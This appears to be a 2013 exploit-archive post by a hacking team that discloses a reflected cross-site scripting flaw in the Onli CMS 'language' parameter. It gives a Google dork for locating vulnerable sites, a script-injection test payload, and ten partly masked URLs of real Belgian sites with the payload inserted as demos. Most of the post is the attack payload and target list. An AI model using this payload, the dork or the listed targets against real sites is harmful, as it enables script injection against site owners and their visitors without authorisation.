Home / exploits Onli Cross site scripting Vulnerability
Posted on 28 October 2013
==================================================================== # Exploit Title : Onli Cross site scripting Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.onli.be # Google Dork : intext:"powered by ONLI" # Date: 2013/10/27 # Tested on: Windows 7 # ------------------------------------------------ # # Exploit : # # Location : http://site.com/index.php?language=[xss] # # Method : Get # # Script For Test : "/><script>alert(1);</script> # ------------------------------------------------ # # Demo: # # http://begolXXockey.be/index.php?language="/><script>alert(1);</script> # # http://www.bCelions.be/index.php?language="/><script>alert(1);</script> # # http://hockeyXntich.be//index.php?language="/><script>alert(1);</script> # # http://www.thXndiana.be/index.php?language="/><script>alert(1);</script> # # http://www.rasXte.be/index.php?language="/><script>alert(1);</script> # # http://www.viXry.be/index.php?language="/><script>alert(1);</script> # # http://www.gaXXtoise.be/index.php?language="/><script>alert(1);</script> # # http://eclairXXckey.be/index.php?language="/><script>alert(1);</script> # # http://knokXXkehockey.be/index.php?language="/><script>alert(1);</script> # # http://plaXrshouse.be/index.php?language="/><script>alert(1);</script> # ###################### discovered by : ACC3SS ######################
